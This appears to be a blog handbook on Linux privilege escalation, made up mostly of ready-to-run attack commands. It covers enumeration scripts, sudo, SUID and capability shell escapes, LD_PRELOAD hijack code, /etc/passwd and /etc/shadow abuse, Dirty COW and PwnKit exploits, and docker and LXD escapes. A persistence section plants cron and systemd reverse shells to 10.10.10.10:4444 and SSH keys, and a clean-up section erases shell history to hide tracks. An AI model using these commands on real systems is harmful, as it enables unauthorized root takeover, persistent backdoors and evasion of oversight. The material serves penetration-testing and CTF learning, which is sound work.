Breaking Root: The Ultimate Linux Priv Esc Handbook

---

---

Overview

Privilege escalation on Linux is both an art and a science. For red teamers, penetration testers, and CTF players, it’s the moment of truth — the final step where a low-privileged foothold morphs into full system compromise.

This post is your definitive breakdown — a field guide combining automation, manual tactics, CVEs, and post-exploitation persistence techniques. Every command here has been field-tested in live labs, CTFs, and real-world assessments.

Automated Enumeration Tools

Let’s start with the recon phase. Before exploiting, enumerate everything — system, users, cron jobs, SUIDs, capabilities, kernel, network, and more.

LinPEAS — The King of Enumeration

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh -a              # All checks (deep mode)
./linpeas.sh -s              # Superfast stealth mode
./linpeas.sh -P password123  # With sudo password

LinPEAS dives through configs, sudo rules, cron jobs, kernel exploits, and more. Always run it first.

Linux Exploit Suggester

Find potential kernel exploits based on your version.

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Version 2 adds even more CVE mappings:

wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl -k 3.9  # Specific kernel

Linux Smart Enumeration (LSE)

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
chmod +x lse.sh
./lse.sh -l1
./lse.sh -l2

pspy — Process Snooping without Root

Detects running cron jobs and background tasks.

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64 -pf -i 1000

GTFONow — Automated Exploitation

Automates GTFOBins attacks (SUIDs, capabilities, sudo).

wget https://raw.githubusercontent.com/Frissi0n/GTFONow/main/gtfonow.py
python3 gtfonow.py

---

Manual Enumeration

Once you’ve automated, dive deep manually.

System Information

uname -a
cat /etc/issue
cat /etc/*-release
hostname
dmesg | grep Linux
lsb_release -a

User Enumeration

id
whoami
cat /etc/passwd
cat /etc/shadow
cat /etc/group

Process and Network Recon

ps aux
ss -tulpn
ip a
iptables -L

Environment and History

env
echo $PATH
history
cat ~/.bash_history

Sudo Exploitation

Check Privileges

sudo -l
sudo -V

Common Exploits via GTFOBins

sudo vim -c ':!/bin/sh'
sudo less /etc/hosts  # then !bash
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'

LD_PRELOAD Exploit

cat > shell.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}
EOF

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=./shell.so find

LD_LIBRARY_PATH Hijack

cat > library_path.c << EOF
#include <stdlib.h>
void hijack() __attribute__((constructor));
void hijack() {
    setresuid(0,0,0);
    system("/bin/bash -p");
}
EOF
gcc -shared -fPIC -o /tmp/libcrypt.so.1 library_path.c
sudo LD_LIBRARY_PATH=/tmp command

CVE-2019–14287 — Sudo Bypass

sudo -u#-1 /bin/bash

---

SUID / SGID Exploitation

Find Binaries

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Exploit Examples

/bin/bash -p
find . -exec /bin/sh -p \; -quit
vim -c ':py3 import os; os.execl("/bin/sh","sh","-pc","reset; exec sh -p")'
python -c 'import os; os.execl("/bin/sh","sh","-p")'

Create your own SUID binary:

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
/tmp/rootbash -p

---

Capabilities

Find all:

getcap -r / 2>/dev/null

Exploit cap_setuid:

/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Exploit cap_dac_override:

python -c 'open("/etc/passwd","a").write("hacker::0:0::/root:/bin/bash\n")'

---

Cron Jobs & Timers

Enumerate

cat /etc/crontab
ls -la /etc/cron.*
systemctl list-timers --all

If writable:

echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' >> /path/to/script.sh

Wildcard Injection:

touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'

---

NFS no_root_squash Exploit

showmount -e [target_ip]
mount -t nfs [target]:/share /tmp/nfs
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash

---

Writable /etc/passwd

Add Root User

openssl passwd -1 -salt ignite password123
echo 'root2:$1$ignite$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
su root2

---

Kernel Exploits

Dirty COW (CVE-2016–5195)

wget https://github.com/firefart/dirtycow/raw/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password123

PwnKit (CVE-2021–4034)

wget https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.c
make
./cve-2021-4034

---

Docker & LXD Escalation

If user in docker group:

docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash

If LXD:

lxc init ubuntu:18.04 privesc
lxc config device add privesc disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bash

---

Persistence Techniques

SSH Key

ssh-keygen -t rsa -b 4096
echo "ssh-rsa AAA..." >> ~/.ssh/authorized_keys

Cron Backdoor

echo "* * * * * bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" | crontab -

Systemd Service

cat > /etc/systemd/system/backdoor.service << EOF
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
EOF
systemctl enable backdoor.service
systemctl start backdoor.service

---

Password & Credential Discovery

grep -r "password" /home/ 2>/dev/null
find /var/www -name "*.php" | xargs grep -i pass
find / -name ".env" 2>/dev/null
find / -name "id_rsa" 2>/dev/null

---

Clean-Up & Stealth

history -c && rm ~/.bash_history
unset HISTFILE

Use LinPEAS -s mode for stealth and clean any binaries or exploits post-use.

---

Resources

• GTFOBins

• HackTricks Linux Privilege Escalation

• PayloadsAllTheThings

• Internal All The Things

• HackingArticles — PrivEsc Cheat Sheet

---

Final Words

Privilege escalation isn’t about memorizing commands — it’s about understanding how misconfigurations become weapons. Each vector — from a simple SUID bit to a misconfigured NFS share — represents a story of trust broken and control seized.